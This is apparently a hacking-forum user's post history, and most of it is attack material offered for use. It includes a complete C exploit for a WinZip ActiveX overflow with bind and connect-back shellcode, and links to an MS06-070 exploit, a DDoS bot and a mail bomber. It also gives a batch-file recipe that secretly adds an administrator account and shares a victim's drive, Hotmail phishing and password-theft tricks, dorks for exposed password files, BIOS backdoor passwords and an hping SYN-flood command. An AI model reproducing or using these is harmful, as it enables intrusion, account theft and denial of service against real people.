
Everything posted by zbeng

  1. more info : -->http://research.eeye.com/html/advisories/published/AD20061114.html see the other topic for the code, this is the compiled version http://rapidshare.com/files/3585145/ms06070.rar.html http://share.urbanfriends.us/savefile_php/uploads/afee542728.rar Microsoft Windows Wkssvc NetrJoinDomain2 Stack Overflow(MS06-070) Exploit *-*-*-*-*-* rInG04h love ??¨[sherry] *-*-*-*-*-* Compiler by rInG04h Dirshell.Com [code]usage: ms06070 targetip DomainName ------------------Eviloctal Security Team----------------------- [url]Http://forum.eviloctal.com[/url] rInG04h[est] _________________ for i am teh x0r h4xx0ring 24/7
  2. #include <stdio.h> #include <stdlib.h> #include <sys/types.h> #include <sys/stat.h> #include <fcntl.h> #include <unistd.h> #include <getopt.h> #define NOPSIZE 999999 struct target { char* name; int retaddr; }; struct shellcode { char* name; short port; int host; char* shellcode; }; int targetno = 1; struct target targets[] = { {"WinXP SP2(en) WinZIP 10.0.6667",0x02DA3269} /* IE 6.0.2900.2180.xp_sp2_gdr.050301-1519 WZ 10.0(6667)" */ }; int shellno = 2; struct shellcode shellcodes[] = { {"Win32 x86 bind() shellcode (4444/tcp default)",162,-1, "x48x40xf5x49xd6x4axf9x91x47x96x2fxf8x9bx37x41xf5" "x99x47xf9xf9xfcxf9x48x4ex4bx9bx90x9bxf5x97x40xf9" "xd6x41xf9x48x9bx92xfdx9bx49x42x4fx9fx90xd6x27x9b" "x93x46x2fx90xfdx4ax6ax51x59xd9xeexd9x74x24xf4x5b" "x81x73x13xbcxe8x2bx27x83xebxfcxe2xf4x3dx2cx7fxd5" "x43x17xd7x4dx57xa5xc3xdex43x17xd4x47x37x84x0fx03" "x37xadx17xacxc0xedx53x26x53x63x64x3fx37xb7x0bx26" "x57xa1xa0x13x37xe9xc5x16x7cx71x87xa3x7cx9cx2cxe6" "x76xe5x2axe5x57x1cx10x73x98xc0x5exc2x37xb7x0fx26" "x57x8exa0x2bxf7x63x74x3bxbdx03x28x0bx37x61x47x03" "xa0x89xe8x16x67x8cxa0x64x8cx63x6bx2bx37x98x37x8a" "x37xa8x23x79xd4x66x65x29x50xb8xd4xf1xdaxbbx4dx4f" "x8fxdax43x50xcfxdax74x73x43x38x43xecx51x14x10x77" "x43x3ex74xaex59x8exaaxcaxb4xeax7ex4dxbex17xfbx4f" "x65xe1xdex8axebx17xfdx74xefxbbx78x74xffxbbx68x74" "x43x38x4dx4fxadxb4x4dx74x35x09xbex4fx18xf2x5bxe0" "xebx17xfdx4dxacxb9x7exd8x6cx80x8fx8ax92x01x7cxd8" "x6axbbx7exd8x6cx80xcex6ex3axa1x7cxd8x6axb8x7fx73" "xe9x17xfbxb4xd4x0fx52xe1xc5xbfxd4xf1xe9x17xfbx41" "xd6x8cx4dx4fxdfx85xa2xc2xd6xb8x72x0ex70x61xccx4d" "xf8x61xc9x16x7cx1bx81xd9xfexc5xd5x65x90x7bxa6x5d" "x84x43x80x8cxd4x9axd5x94xaax17x5ex63x43x3ex70x70" "xeexb9x7ax76xd6xe9x7ax76xe9xb9xd4xf7xd4x45xf2x22" "x72xbbxd4xf1xd6x17xd4x10x43x38xa0x70x40x6bxefx43" "x43x3ex79xd8x6cx80x55xffx5ex9bx78xd8x6ax17xfbx27"}, {"Win32 x86 connect() shellcode (4444/tcp default)",167,160, "xfcx6axebx4dxe8xf9xffxffxffx60x8bx6cx24x24x8bx45" "x3cx8bx7cx05x78x01xefx8bx4fx18x8bx5fx20x01xebx49" 
"x8bx34x8bx01xeex31xc0x99xacx84xc0x74x07xc1xcax0d" "x01xc2xebxf4x3bx54x24x28x75xe5x8bx5fx24x01xebx66" "x8bx0cx4bx8bx5fx1cx01xebx03x2cx8bx89x6cx24x1cx61" "xc3x31xdbx64x8bx43x30x8bx40x0cx8bx70x1cxadx8bx40" "x08x5ex68x8ex4ex0execx50xffxd6x66x53x66x68x33x32" "x68x77x73x32x5fx54xffxd0x68xcbxedxfcx3bx50xffxd6" "x5fx89xe5x66x81xedx08x02x55x6ax02xffxd0x68xd9x09" "xf5xadx57xffxd6x53x53x53x53x43x53x43x53xffxd0x68" "x01x02x03x04x66x68x11x5cx66x53x89xe1x95x68xecxf9" "xaax60x57xffxd6x6ax10x51x55xffxd0x66x6ax64x66x68" "x63x6dx6ax50x59x29xccx89xe7x6ax44x89xe2x31xc0xf3" "xaax95x89xfdxfex42x2dxfex42x2cx8dx7ax38xabxabxab" "x68x72xfexb3x16xffx75x28xffxd6x5bx57x52x51x51x51" "x6ax01x51x51x55x51xffxd0x68xadxd9x05xcex53xffxd6" "x6axffxffx37xffxd0x68xe7x79xc6x79xffx75x04xffxd6" "xffx77xfcxffxd0x68xf0x8ax04x5fx53xffxd6xffxd0"} }; char html1[]="<HTML>rn<HEAD>rn<TITLE></TITLE>rn</HEAD>rn" "<BODY>rn<SCRIPT LANGUAGE="VBScript">rnSub WZ" "FILEVIEW_OnAfterItemAdd(Item)rnWZFILEVIEW.FilePa" "ttern = ""; /* smash the stack here */ char html2[]=""rnend subrn</SCRIPT>rnrn<OBJECT ID="WZFILEV" "IEW" WIDTH=200 HEIGHT=200rnCLASSID="CLSID:A09A" "E68F-B14D-43ED-B713-BA413F034904">rn</OBJECT>r" "n</BODY>rn</HTML>rn"; char bmphdr[]="x42x4dx3exbbx2dx00x00x00x00x00x36x00x00" "x00x28x00x00x00xe7x03x00x00xe7x03x00x00" "x01x00x18x00x00x00x00x00x08xbbx2dx00x00" "x00x00x00x00x00x00x00x00x00x00x00x00x00" "x00x00"; int ret; void help(char* progname){ int count; printf("[ Usage instructions.n[n"); printf("[ %s <required> (optional)n[n[ --filename|-f <file.html>n",progname); printf("[ --imgname|-i <image.bmp>n[ --shellcode|-s <shell#>n"); printf("[ --shellport|-p (port)n"); printf("[ --shellhost|-i (ip)n"); printf("[ --target|-t <target#/0xretaddr>n[n"); printf("[ Target#'sn"); for(count = 0;count <= targetno - 1;count++){ printf("[ %d %s 0x%xn",count,targets[count],targets[count]); } printf("[n[ Shellcode#'sn"); for(count = 0;count <= shellno - 1;count++){ printf("[ %d "%s" (length %d 
bytes)n",count,shellcodes[count].name,strlen(shellcodes[count].shellcode)); } exit(0); } void setret(char* retarg){ int value = atoi(retarg); switch(value){ case 0: printf("[ Using target '%s'n",targets[ret].name); ret = targets[ret].retaddr; break; default: ret = strtoul(retarg,NULL,16); printf("[ Using return address '0x%x'n",ret); break; } } int main(int argc, char* argv[]){ unsigned long i, fd; int c, index, payg, paya, lhost; short shellport, shellport2; int ishell = 0, itarg = 0; char *buffer, *file, *img, *payload; static struct option options[] = { {"filename", 1, 0, 'f'}, {"imgname", 1, 0, 'i'}, {"target", 1, 0, 't'}, {"shellcode", 1, 0, 's'}, {"shellport", 1, 0, 'p'}, {"shellhost", 1, 0, 'd'}, {"help", 0, 0,'h'} }; printf("[ WinZip <= 10.0.7245 FileView ActiveX overflow exploitn"); while(c != -1){ c = getopt_long(argc,argv,"f:i:t:s:p:D:h",options,&index); switch©{ case 'f': file = optarg; break; case 'i': img = optarg; break; case 't': itarg = 1; setret(optarg); if(strlen((char*)&ret) < 4){ fprintf(stderr,"[ Selected target contains a null address!n"); exit(-1); } break; case 's': if(ishell==0){ payg = atoi(optarg); switch(payg){ case 0: printf("[ Using shellcode '%s' (%d bytes)n",shellcodes[payg].name,strlen(shellcodes[payg].shellcode)); payload = malloc(strlen(shellcodes[payg].shellcode)+1); memset(payload,0,strlen(shellcodes[payg].shellcode)+1); memcpy((void*)payload,(void*)shellcodes[payg].shellcode,strlen(shellcodes[payg].shellcode)); shellport2 = 4444; ishell = 1; break; case 1: printf("[ Using shellcode '%s' (%d bytes)n",shellcodes[payg].name,strlen(shellcodes[payg].shellcode)); payload = malloc(strlen(shellcodes[payg].shellcode)+1); memset(payload,0,strlen(shellcodes[payg].shellcode)+1); memcpy((void*)payload,(void*)shellcodes[payg].shellcode,strlen(shellcodes[payg].shellcode)); shellport2 = 4444; ishell = 1; break; default: printf("[ Invalid shellcode selection %dn",payg); exit(0); break; } } break; case 'p': if(ishell==1){ 
if(shellcodes[payg].port > -1){ paya = strlen(payload); shellport = atoi(optarg); shellport2 = shellport; shellport =(shellport&0xff)<<8 | shellport>>8; memcpy((void*)&payload[shellcodes[payg].port],&shellport,sizeof(shellport)); if(paya > strlen(payload)) { printf("[ Error shellcode port introduces null bytesn"); exit(1); } printf("[ Shellcode port changed to '%u'n",atoi(optarg)); } else{ printf("[ (%s) port selection is ignored for current shellcoden",optarg); } } else{ printf("[ No shellcode selected yet, ignoring (%s) port selectionn",optarg); } break; case 'd': if(ishell==1){ if(shellcodes[payg].host > -1){ paya = strlen(payload); lhost = inet_addr(optarg); memcpy((void*)&payload[shellcodes[payg].host],&lhost,sizeof(lhost)); if(paya > strlen(payload)){ printf("[ Error shellhost introduces null bytesn"); exit(1); } printf("[ Shellhost has been changed to '%s'n",optarg); } else{ printf("[ (%s) shellhost selection is ignored for current shellcoden",optarg); } } else { printf("[ No shellcode selected yet, ignoring (%s) shellhost selectionn",optarg); } break; case 'h': help(argv[0]); break; default: break; } } if(ishell==0||itarg==0||strlen(file)==0||strlen(img)==0){ printf("[ Error insufficient arguements, try running '%s --help'n",argv[0]); exit(0); } // create image printf("[ Creating image containing shellcode '%s'n",img); fd = open(img,O_RDWR|O_CREAT,S_IRWXU); if(fd == -1){ fprintf(stderr,"[ Error creating %sn",file); exit(-1); } write(fd,bmphdr,sizeof(bmphdr)); for(i = 0;i < NOPSIZE;i++){ write(fd,"x90",1); } write(fd,payload,strlen(payload)); close(fd); // create html printf("[ Creating html exploit page '%s'n",file); fd = open(file,O_RDWR|O_CREAT,S_IRWXU); if(fd == -1){ fprintf(stderr,"[ Error creating %sn",file); exit(-1); } write(fd,html1,strlen(html1)); for(i = 0;i < 265;i++){ write(fd,"A",1); } write(fd,&ret,4); for(i = 0;i < 1827;i++){ write(fd,"A",1); } write(fd,html2,strlen(html2)); write(fd,img,strlen(img)); write(fd,html3,strlen(html3)); close(fd); 
} // milw0rm.com [2006-11-15]
  3. Fine ddos bot with help of web-shells. download: http://rapidshare.com/files/3510544/ddos_script_by_Zbeng__.php__.rar.html http://share.urbanfriends.us/savefile_php/uploads/b136935fc5.rar
  4. zbeng

    FTP

    ftp full of usefull software (are vista linux....) vedeti voi ftp://ftp.freenet.de/pub/filepilot/
  5. http://rapidshare.com/files/3508174/Mail_Bomber_1.00.rar.html http://share.urbanfriends.us/savefile_php/uploads/40080c0ab2.rar
  6. zbeng

    Sick

    bine ai venit;9
  7. kwe ce nai zis hai ca vin si eu...sau poate dai o vizita pe la madrid;))
  8. in sfarsit un post serios....chiar ai o "meserie" buna pentru calculatuarele tale...
  9. ms chiar ma interesa punctu 1 si 5.
  10. http://rapidshare.com/files/3477969/SCD___binder___1.0.rar.html http://share.urbanfriends.us/savefile_php/uploads/9a327557ea.rar 65 KB
  11. '>http://urbanfriends.us/zbeng/www/asa%20o%20fi.html le gasiti acolo;)
  12. zbeng

    Netbios

    This video shows how to exploit file sharing. DOWNLOAD http://rapidshare.com/files/3459576/20_netbios.rar.html http://share.urbanfriends.us/savefile_php/uploads/dc1aab37e9.rar
  13. -Bazics- Opening a dos prompt -> Go to start and then execute and write cmd and press ok Now insert this command: net And you will get something like this NET [ ACCOUNTS | COMPUTER | CONFIG | CONTINUE | FILE | GROUP | HELP | HELPMSG | LOCALGROUP | NAME | PAUSE | PRINT | SEND | SESSION | SHARE | START | STATISTICS | STOP | TIME | USE | USER | VIEW ] Ok in this tutorial we well use 3 of the commands listed here they are: net user , net share and net send We will select some of those commands and put them on a .bat file. What is a .bat file? Bat file is a piece of text that windows will execute as commands. Open notepad and whrite there: dir pause And now save this as test.bat and execute it. Funny aint it ? ---------------------- Starting ------------------- -:Server:- The plan here is to share the C: drive and make a new user with administrators access Step one -> Open a dos prompt and a notebook The dos prompt will help you to test if the commands are ok and the notebook will be used to make the .bat file. Command n 1-> net user neo /add What does this do? It makes a new user called neo you can put any name you whant Command n 2-> net localgroup administrators neo /add This is the command that make your user go to the administrators group. Depending on the windows version the name will be different. If you got an american version the name for the group is Administrators and for the portuguese version is administradores so it's nice yo know wich version of windows xp you are going to try share. Command n 3->net share system=C: /unlimited This commands share the C: drive with the name of system. Nice and those are the 3 commands that you will need to put on your .bat file and send to your friend. -!extras!- Command n 4-> net send urip I am ur server Where it says urip you will insert your ip and when the victim opens the .bat it will send a message to your computer and you can check the victim ip. 
->To see your ip in the dos prompt put this command: ipconfig -----------------------: Client :---------------- Now that your friend opened your .bat file her system have the C: drive shared and a new administrator user. First we need to make a session with the remote computer with the net use command , you will execute these commands from your dos prompt. Command n 1 -> net use \victimip neo This command will make a session between you and the victim Of course where it says victimip you will insert the victim ip. Command n 2-> explorer \victimipsystem And this will open a explorer windows in the share system wich is the C: drive with administrators access! SIMPLU SI FOLOSITOR;)
  14. 1)"Index of /admin" 2)"Index of /password" 3)"Index of /mail" 4)"Index of /" +banques +filetype:@ls (for france...) 5)"Index of /" +passwd 6)"Index of /" password.txt And you can continue as long as your imagination is active. As an example of my results, I saw a great deal of information from the central banks of Luxembourg and Switzerland, could admin a SQL server, ... So, I don't know if it is a great technical bug (what these queries find is a server misconfiguration, directory listing left enabled on sensitive paths, rather than a software flaw), but I know about hacking and security (I would like to be a security consultant later..) (and I am looking for a training in security in a foreign country like US or England...) and even if we don't get root access immediately, it is a great step for social engineering and spying.
  15. Download: http://depositfiles.com/files/373416
  16. 466 True Type Fonts and 72 OpenType Fonts Size: 16.5 MB Download: http://rapidshare.com/files/3354830/bestF.rar
  17. Template Monster 10780 Wordpress Theme | 2.7 Mb Download: Code: http://rapidshare.com/files/3351363/temp107.rar
  18. o intrebar tu te ai uitat la site-ul principal urbanfriends;)
  19. zbeng

    NASA

    NASA Department website Hacked. DOWNLOAD http://rapidshare.com/files/3344479/92_meh.zip.html
  20. tutorialu comlet il puteti vedea aici: '>http://urbanfriends.us/zbeng/www/index.php.htm
  21. This file will guide you follwing: 1:- How to hack hotmail with fake login screen (2 different ways) 2:- How to send fake e-mails to any one 3:- How to detect a fake message into hotmail 4:- How to get persons ip addrress through msn messenger 5:- How to fool ur victim and get his pass 6:- Easiest Way 7:- Change msn messenger title 8:- How to send viruses to hotmail 1st:- How to hack hotmail with fake login screen 1st Way:- Upload your hotmail`s fake login screen on a webserver and if you then send these codes to your victim from yahoo or another mail sending program.The codes are <script> location.href="http://www.yoursite.com/yourhotmailfakepage.html/" </script> and the user will be automatically redirected to your fake hotmail screen from their e-mail box & you r done. Note: replace the website and page name but donot forget to put /" in the end of link. 2nd way:- Start chatting with ur victim and send him the fake login screen through ur messenger and done. Note For fast recieving: In order for u to recieve pass as fast as victim types it then in my prog where it says your user name plz type your e-mail address which doesnot belong to hotmail & yahoo. 2nd:- How to send fake e-mails to any one. This is very easy go to http://www.boxfrog.com/ register there and when u r in ur members area click on create message and in from filed type in any ones e-mail address and the message will be sent. 3rd:- How to detect a fake message into hotmail. This is also very easy open ur e-mail box go to opetions select display setting or message display setting or(some thing like this) now select full where it says message display settings or something like this.Open the mail which u thought to be fake now in the last where it says from u can see the address of that site from where the mail is sent but if some one has sent it through some sort of prog it will tell u his ip. 4th:- How to get persons ip addrress through msn messenger. 
Open ur messenger start chatting with ur victim open ms dos and type netstat -n there but donot press enter and then minimize it after this send something to ur victim and as soon as he accept it the hotmail messenger will say connecting this is the time when u re maximize ur msdos and press enter the ip address next to time_wait: will the victims ip.Hack him,Nuke him, do any thing you want but i will not be responsible for any serious work. 5th:- How to fool ur victim and get his pass This is as easy as a chicken lays an egg.[joke] create a fake e-mail address and like [mail]cgi_7t86_server@hotmail.comThis[/mail] email address is being protected from spam bots, you need Javascript enabled to view it This email address is being protected from spam bots, you need Javascript enabled to view it and then go to compose and then ask ur victim in message body (this is hotmail automated bot of msn. Our hotmail was attacked by hackers to verify that they have not disturbed your password plz mail us your password with user name or your account will be cancled with in 10 days and try to forward this message to all of your friends on hotmail. Regards Hotmail automated bot Metro) This will fool your victim and he will send pass to you easy na. 6th:- Now the easiest way go to hotmail.com type ur victims e-mail address in and try to guess password coz hackers must have good guessing power. Go to hotmail.com click on forgot password type victims e-mail address in and all the things you need there after that try to guess his secret answer if u u can change his pass. 
7th:- Try to use a soft which changes msn title on chatting window replace it with the which currently is (never give out your msn password or credit card number) change it to (plz type your msn password below to start the conversation because for security reasons your password will not be visible to the person who you talking with) this will also fool your victim.You can find such soft at 8th:-'>http://www.mess.be/ 8th:- How to send viruses to hotmail It is easy send the victim an e-mail with virus attachment using boxfrog.com and in from field type any hotmail address easy. Comments & suggestions should be mailed to [mail]ppa9@boxfrog.comThis[/mail] email address is being protected from spam bots, you need Javascript enabled to view it This email address is being protected from spam bots, you need Javascript enabled to view it but no junk mail plz (like u did last time) Note: Donot use sample fake login screen thats what every one is doing and i have recievd 400 peoples passwords plz create new fake login screens by fake login screen creator. By tristar
  22. This is a password hack but it clears the BIOS such that the next time you start the PC, the CMOS does not ask for any password. Now if you are able to bring the DOS prompt up, then you will be able to change the BIOS setting to the default. To clear the CMOS do the following: Get DOS prompt and type: DEBUG hit enter -o 70 2e hit enter -o 71 ff hit enter -q hit enter exit hit enter Restart the computer. It works on most versions of the AWARD BIOS. Basic BIOS password crack - works 9.9 times out of ten This is a password hack but it clears the BIOS such that the next time you start the PC, the CMOS does not ask for any password. Now if you are able to bring the DOS prompt up, then you will be able to change the BIOS setting to the default. To clear the CMOS do the following: Get DOS prompt and type: DEBUG hit enter -o 70 2e hit enter -o 71 ff hit enter -q hit enter exit hit enter Restart the computer. It works on most versions of the AWARD BIOS. Accessing information on the hard disk When you turn on the host machine, enter the CMOS setup menu (usually you have to press F2, or DEL, or CTRL+ALT+S during the boot sequence) and go to STANDARD CMOS SETUP, and set the channel to which you have put the hard disk as TYPE=Auto, MODE=AUTO, then SAVE & EXIT SETUP. Now you have access to the hard disk. Standard BIOS backdoor passwords The first, less invasive, attempt to bypass a BIOS password is to try on of these standard manufacturer's backdoor passwords: AWARD BIOS AWARD SW, AWARD_SW, Award SW, AWARD PW, _award, awkward, J64, j256, j262, j332, j322, 01322222, 589589, 589721, 595595, 598598, HLT, SER, SKY_FOX, aLLy, aLLY, Condo, CONCAT, TTPTHA, aPAf, HLT, KDD, ZBAAACA, ZAAADA, ZJAAADC, djonet, %
  23. We all know hping as a network scanning tool and analyzer. In this article I use it as a DoS tool… pretty simple. First off, open tcpdump so you can monitor what is going on. Then I format the command for the attack, which looks like this: exploit2:/Users/sting3r root# hping2 -a 192.168.2.126 -S 192.168.2.115 -p 80 -i u10000 In the command you'll notice the -a switch, which is used to spoof the source address. My current IP at the time of the attack was 192.168.2.192. This also eliminates the possibility of getting the RST packet from the targeted host. The -i switch dictates the packet interval. Now understand you will not see any of the return traffic to your machine because of the -a spoof source switch. In the screenshot you can see the traffic between the spoofed source and the target… this is a pretty basic attack and can be mitigated, for example with SYN cookies on the target host and with ingress filtering that drops packets carrying spoofed source addresses.